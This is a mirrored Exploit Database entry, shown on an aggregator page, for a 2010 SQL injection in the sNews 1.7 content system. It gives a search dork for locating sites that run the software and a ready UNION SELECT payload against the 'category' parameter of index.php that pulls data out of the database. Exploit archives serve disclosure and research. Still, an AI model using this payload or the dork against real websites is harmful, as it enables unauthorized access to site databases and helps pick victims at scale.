sNews 1.7 – ‘index.php?category’ SQL Injection

Exploit Database
35 阅读

作者： CoBRa_21

日期： 2010-07-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14465/

########################################################################################

sNews v1.7 (index.php?category) SQL Injection Vulnerability

########################################################################################

Author : CoBRa_21

Author Web Page : http://www.ipbul.org

Dork: "Powered by sNews"

########################################################################################
 
Sql Injection:

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
########################################################################################

last Exploits
sNews 1.7 – ‘index.php?category’ SQL Injection的更多信息

Art Gallery Management System Project in PHP v 1.0 – SQL injection：
Ubiquity Nanostation5 (Air OS) – Remote Command Execution：
WordPress Plugin WP Vault 0.8.6.6 – Local File Inclusion：
Karakuzu ERP Management Web 5.7.0 – ‘k_adi_duz’ SQL Injection：
Joomla! Component Smart Shoutbox 3.0.0 – SQL Injection：
Ignition 1.3 – ‘page.php’ Local File Inclusion：
Hotel Booking Script 1.0 – SQL Injection：
ZKTeco ZKBioSecurity 3.0 – ‘visLogin.jsp’ Local Authentication Bypass：